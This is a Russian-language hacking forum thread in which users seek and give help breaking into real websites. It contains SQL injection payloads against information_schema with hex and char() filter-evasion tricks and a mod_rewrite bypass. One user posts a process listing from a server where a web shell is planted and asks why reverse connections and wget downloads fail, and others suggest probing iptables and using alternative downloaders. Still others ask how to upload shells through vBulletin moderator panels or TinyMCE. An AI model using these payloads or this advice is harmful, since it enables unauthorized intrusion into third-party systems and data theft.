Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. L I G A

    L I G A Banned

    Joined:
    27 Jul 2008
    Messages:
    482
    Likes Received:
    380
    Reputations:
    49
    36))+union+select+1+and+((1
    итд...
     
    1 person likes this.
  2. AFoST

    AFoST Elder - Старейшина

    Joined:
    28 May 2007
    Messages:
    588
    Likes Received:
    485
    Reputations:
    176
    смотря какой модрерайт.
    встречаются обходимые
    например
    http://site.ru/id/1+order+by+1+--+-/
     
  3. YuNi|[c

    YuNi|[c Elder - Старейшина

    Joined:
    17 Sep 2006
    Messages:
    293
    Likes Received:
    33
    Reputations:
    18
    есть SQLi на сайте, версия 4.1.12 MySQL
    таблицы брутил со всеми какими есть словарями, но ни одного не нашел. Там помоему префикс какой то. Подскажите есть ли как нибудь брутит префикс или обйти какими то символами?
     
  4. Roston

    Roston Elder - Старейшина

    Joined:
    31 Jul 2008
    Messages:
    337
    Likes Received:
    104
    Reputations:
    8
    Ну в сипте можно указзывать пути к словарям с префиксами... попробуй ним
     
  5. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    del
     
    #10145 fng, 18 Nov 2009
    Last edited: 18 Nov 2009
  6. ElteRUS

    ElteRUS Elder - Старейшина

    Joined:
    11 Oct 2007
    Messages:
    367
    Likes Received:
    460
    Reputations:
    93
    Что del ? =) С ссылки нужно было начинать. Обещаю, что не буду патентовать твою скулю

    details.php?id=-36))+union+select+1,2,3,4,unhex(hex(table_name)),6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,2,3,4,5,6,7,8,9,10,1,1+from+information_schema.tables--+

    Add: xотя нет, сейчас я соберу хакерскую пресс-конференцию, и оглашу эту скулю всем.
     
    #10146 ElteRUS, 18 Nov 2009
    Last edited: 18 Nov 2009
  7. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    просто поля подобрал потом)
    кстати там почему-то limit не работает...
     
  8. bons

    bons Elder - Старейшина

    Joined:
    20 Dec 2007
    Messages:
    286
    Likes Received:
    121
    Reputations:
    21
    limit не будет работать только если это не mysql
     
  9. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    почему, длина строки запроса может быть ограничена просто
     
  10. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    1,997
    Likes Received:
    996
    Reputations:
    155
    Code:
    UID        PID  PPID  C    SZ   RSS PSR STIME TTY          TIME CMD
    root         1     0  0   929   580   2 Jun14 ?        00:00:43 init [3]
    root         2     0  0     0     0   1 Jun14 ?        00:00:00 [kthreadd]
    root         3     2  0     0     0   0 Jun14 ?        00:00:03 [migration/0]
    root         4     2  0     0     0   0 Jun14 ?        00:00:00 [ksoftirqd/0]
    root         5     2  0     0     0   0 Jun14 ?        00:00:04 [watchdog/0]
    root         6     2  0     0     0   1 Jun14 ?        00:00:01 [migration/1]
    root         7     2  0     0     0   1 Jun14 ?        00:00:01 [ksoftirqd/1]
    root         8     2  0     0     0   1 Jun14 ?        00:00:03 [watchdog/1]
    root         9     2  0     0     0   2 Jun14 ?        00:00:01 [migration/2]
    root        10     2  0     0     0   2 Jun14 ?        00:00:02 [ksoftirqd/2]
    root        11     2  0     0     0   2 Jun14 ?        00:00:03 [watchdog/2]
    root        12     2  0     0     0   3 Jun14 ?        00:00:00 [migration/3]
    root        13     2  0     0     0   3 Jun14 ?        00:00:01 [ksoftirqd/3]
    root        14     2  0     0     0   3 Jun14 ?        00:00:07 [watchdog/3]
    root        15     2  0     0     0   0 Jun14 ?        00:04:46 [events/0]
    root        16     2  0     0     0   1 Jun14 ?        00:03:05 [events/1]
    root        17     2  0     0     0   2 Jun14 ?        00:03:28 [events/2]
    root        18     2  0     0     0   3 Jun14 ?        00:04:45 [events/3]
    root        19     2  0     0     0   0 Jun14 ?        00:00:00 [khelper]
    root        97     2  0     0     0   0 Jun14 ?        00:00:00 [kblockd/0]
    root        98     2  0     0     0   1 Jun14 ?        00:00:00 [kblockd/1]
    root        99     2  0     0     0   2 Jun14 ?        00:00:00 [kblockd/2]
    root       100     2  0     0     0   3 Jun14 ?        00:00:01 [kblockd/3]
    root       103     2  0     0     0   1 Jun14 ?        00:00:00 [kacpid]
    root       104     2  0     0     0   0 Jun14 ?        00:00:00 [kacpi_notify]
    root       247     2  0     0     0   0 Jun14 ?        00:00:00 [ata/0]
    root       248     2  0     0     0   1 Jun14 ?        00:00:00 [ata/1]
    root       249     2  0     0     0   2 Jun14 ?        00:00:00 [ata/2]
    root       250     2  0     0     0   3 Jun14 ?        00:00:00 [ata/3]
    root       251     2  0     0     0   2 Jun14 ?        00:00:00 [ata_aux]
    root       252     2  0     0     0   0 Jun14 ?        00:00:00 [ksuspend_usbd]
    root       257     2  0     0     0   3 Jun14 ?        00:00:00 [khubd]
    root       260     2  0     0     0   3 Jun14 ?        00:00:00 [kseriod]
    root       333     2  0     0     0   1 Jun14 ?        00:00:00 [pdflush]
    root       334     2  0     0     0   3 Jun14 ?        00:26:36 [pdflush]
    root       335     2  0     0     0   2 Jun14 ?        00:00:13 [kswapd0]
    root       336     2  0     0     0   0 Jun14 ?        00:00:00 [aio/0]
    root       337     2  0     0     0   1 Jun14 ?        00:00:00 [aio/1]
    root       338     2  0     0     0   2 Jun14 ?        00:00:00 [aio/2]
    root       339     2  0     0     0   3 Jun14 ?        00:00:00 [aio/3]
    root      1028     2  0     0     0   0 Jun14 ?        00:00:00 [scsi_eh_0]
    root      1030     2  0     0     0   1 Jun14 ?        00:00:00 [scsi_eh_1]
    root      1032     2  0     0     0   3 Jun14 ?        00:00:00 [scsi_eh_2]
    root      1034     2  0     0     0   3 Jun14 ?        00:00:00 [scsi_eh_3]
    root      1053     2  0     0     0   0 Jun14 ?        00:00:00 [khpsbpkt]
    root      1063     2  0     0     0   1 Jun14 ?        00:00:00 [knodemgrd_0]
    root      1101     2  0     0     0   1 Jun14 ?        00:00:00 [kpsmoused]
    root      1106     2  0     0     0   0 Jun14 ?        00:00:00 [kondemand/0]
    root      1107     2  0     0     0   1 Jun14 ?        00:00:00 [kondemand/1]
    root      1108     2  0     0     0   2 Jun14 ?        00:00:00 [kondemand/2]
    root      1109     2  0     0     0   3 Jun14 ?        00:00:00 [kondemand/3]
    root      1114     2  0     0     0   0 Jun14 ?        00:00:00 [rpciod/0]
    root      1115     2  0     0     0   1 Jun14 ?        00:00:00 [rpciod/1]
    root      1116     2  0     0     0   2 Jun14 ?        00:00:00 [rpciod/2]
    root      1117     2  0     0     0   3 Jun14 ?        00:00:00 [rpciod/3]
    root      1120     2  0     0     0   3 Jun14 ?        00:59:16 [md3_raid1]
    root      1123     2  0     0     0   0 Jun14 ?        00:00:19 [md2_raid1]
    root      1126     2  0     0     0   0 Jun14 ?        00:00:02 [md1_raid1]
    root      1128     2  0     0     0   0 Jun14 ?        00:00:00 [reiserfs/0]
    root      1129     2  0     0     0   1 Jun14 ?        00:00:00 [reiserfs/1]
    root      1130     2  0     0     0   2 Jun14 ?        00:00:00 [reiserfs/2]
    root      1131     2  0     0     0   3 Jun14 ?        00:00:04 [reiserfs/3]
    root      1225     1  0  3111   848   3 Jun14 ?        00:00:00 /sbin/udevd --daemon
    root      1584     1  0 56282 10708   1 Jun19 ?        00:12:28 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    postfix   1663  5338  0  9562  2096   1 08:44 ?        00:00:00 pickup -l -t fifo -u
    root      3776     1  0   964   512   1 Jun14 ?        00:00:30 mdadm --monitor --scan --daemonise --pid-file /var/run/mdadm.pid --syslog
    apache    4064  1584  0 58211 27936   3 09:39 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4115  1584  0 58229 25840   3 09:40 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4419  1584  0 57307 22596   3 09:46 ?        00:00:03 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4504  1584  0 57704 25460   3 09:48 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4505  1584  0 58098 26584   0 09:48 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    root      4521     1  0  3944  1484   1 Jun14 ?        00:03:02 /usr/sbin/syslog-ng
    apache    4604  1584  0 57458 24192   3 09:50 ?        00:00:02 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4605  1584  0 57377 21772   3 09:50 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4689  1584  0 57456 22288   3 09:52 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4690  1584  0 57383 22400   3 09:52 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4731  1584  0 58100 24432   2 09:53 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4808  1584  0 57700 24324   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4811  1584  0 57693 22308   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4812  1584  0 58228 26288   3 09:55 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4932  1584  0 57464 20660   3 09:58 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4933  1584  0 58223 23496   3 09:58 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4973  1584  0 58163 25112   3 09:59 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4975  1584  0 57636 21560   3 09:59 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4976  1584  0 57401 23344   3 09:59 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    4978  1584  0 57511 21264   3 09:59 ?        00:00:01 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5037  4731  0  2522   744   3 10:00 ?        00:00:00 ping mail.ru
    apache    5044  1584  0 57440 20392   3 10:00 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5045  1584  0 57367 21812   3 10:00 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    root      5077     1  0  7797  1040   0 Jun14 ?        00:00:00 /usr/sbin/sshd
    apache    5095  1584  0 57260 18820   1 10:01 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5181  1584  0 57322 18292   3 10:03 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5189  1584  0 57254 18496   3 10:03 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    root      5239     1  0  3680  1176   1 Jun14 ?        00:02:11 /usr/sbin/ntpd -p /var/run/ntpd.pid
    apache    5281  1584  0 57309 19008   3 10:05 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5321  1584  0 57318 15432   0 10:06 ?        00:00:00 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    apache    5325  4505  0  3656   948   3 10:06 ?        00:00:00 ps -eF
    root      5338     1  0  9549  2124   0 Jun14 ?        00:02:19 /usr/lib64/postfix/master
    postfix   5360  5338  0  9576  2168   1 Jun14 ?        00:00:19 qmgr -l -t fifo -u
    root      5452     1  0  4070   736   0 Jun14 ?        00:01:20 /usr/sbin/cron
    root      5519     1  0  1451   680   2 Jun14 tty2     00:00:00 /sbin/agetty 38400 tty2 linux
    root      5520     1  0  1451   680   2 Jun14 tty3     00:00:00 /sbin/agetty 38400 tty3 linux
    root      5521     1  0  1451   680   3 Jun14 tty4     00:00:00 /sbin/agetty 38400 tty4 linux
    root      5522     1  0  1451   684   1 Jun14 tty5     00:00:00 /sbin/agetty 38400 tty5 linux
    root      5523     1  0  1451   680   0 Jun14 tty6     00:00:00 /sbin/agetty 38400 tty6 linux
    root     29805     1  0  1451   680   2 Jun18 tty1     00:00:00 /sbin/agetty 38400 tty1 linux
    apache   31617  1584  0 57632 23972   1 Aug04 ?        00:00:30 /usr/sbin/apache2 -D DEFAULT_VHOST -D INFO -D LANGUAGE -D SUEXEC -D PHP5 -d /usr/lib64/apache2 -f /etc/apache2/httpd.conf -k start
    Какой из этих процессов является фаерволлом или антивирусом? Или по-другому вопрос задам - есть веб-шелл на сайте, ядро старое, рутаемое, но он не хочет делать бек-коннект. WGET'oм файлы тоже не скачивает, хотя which wget показывает, что WGET есть. Вывод - фаерволл блокирует исходящие соединения? Или нет?
     
    2 people like this.
  11. Spyder

    Spyder Elder - Старейшина

    Joined:
    9 Oct 2006
    Messages:
    1,388
    Likes Received:
    1,209
    Reputations:
    475
    из этих никакой
     
  12. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Есть sql-inj версия БД MySQL 4
    Так как 4 пришлось работать сиптом но сипт для поиска версии использует данный запрос:

    PHP:
    http://site.com/info.php?id=6590999+UNION+SELECT+1,2,3,4,CONCAT(0x7873716C696E6A626567696E,Version(),0x7873716C696E6A656E64),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22-- 
    Проблема в том что сайт не пропускает его x7873716C696E6A626567696E хотя 0x3A проходит в ручную норм

    Можно как-то в СИПТ исправить разделители?
     
  13. SeNaP

    SeNaP Elder - Старейшина

    Joined:
    7 Aug 2008
    Messages:
    378
    Likes Received:
    69
    Reputations:
    20
    char(120,115,113,108,105,110,106,98,101,103,105,110)
     
  14. krypt3r

    krypt3r Elder - Старейшина

    Joined:
    27 Apr 2007
    Messages:
    1,507
    Likes Received:
    389
    Reputations:
    101
    mailbrush, что показывает
    Code:
    /sbin/lsmod | grep ipt
    
    ?
     
  15. Byrger

    Byrger Elder - Старейшина

    Joined:
    7 Mar 2008
    Messages:
    521
    Likes Received:
    26
    Reputations:
    -4
    Спасибо разобрался сам с 1 вопросом

    Сейчас вопрос встал, возможно ли в vBulletin залить шелл через modcp или форум имея права модератора.
     
  16. hackmen

    hackmen Banned

    Joined:
    22 Oct 2007
    Messages:
    110
    Likes Received:
    46
    Reputations:
    1
    Всем привет

    Кто нибудь заливал шелл через tiny_mce редактор? Если да, то как это возможно.

    Сори если не в тему и заранее сэнк.
     
  17. fng

    fng New Member

    Joined:
    12 Nov 2009
    Messages:
    18
    Likes Received:
    0
    Reputations:
    0
    вообще там бред какой-то
    поля получается перебирать все из information_schema, а просто по таблицам нет o_O

    т.е. я делал выборку из таблицы columns, но лимит срабатывал только когда в выборке участвовало поле column_name

    есть у кого предположения почему там так?
     
    #10157 fng, 18 Nov 2009
    Last edited: 18 Nov 2009
  18. Pashkela

    Pashkela Динозавр

    Joined:
    10 Jan 2008
    Messages:
    2,750
    Likes Received:
    1,044
    Reputations:
    339
    i'm sorry, а что еще можно пытаться выбрать из information_schema.columns, кроме как column_name? И, самое главное, зачем?
     
  19. LzD

    LzD Banned

    Joined:
    24 Jul 2009
    Messages:
    51
    Likes Received:
    12
    Reputations:
    2
    акромя wget есть и другие качалки.
    пропатчить ядро никто не мешал админу- а имя системы можно вообще любое вписать :)
    http://www.opennet.ru/docs/RUS/iptables/
     
    #10159 LzD, 18 Nov 2009
    Last edited: 18 Nov 2009
  20. DrAssault

    DrAssault Member

    Joined:
    14 Nov 2008
    Messages:
    149
    Likes Received:
    89
    Reputations:
    8
    Дай ссылочку, глянем ;)
     
Loading...
Thread Status:
Not open for further replies.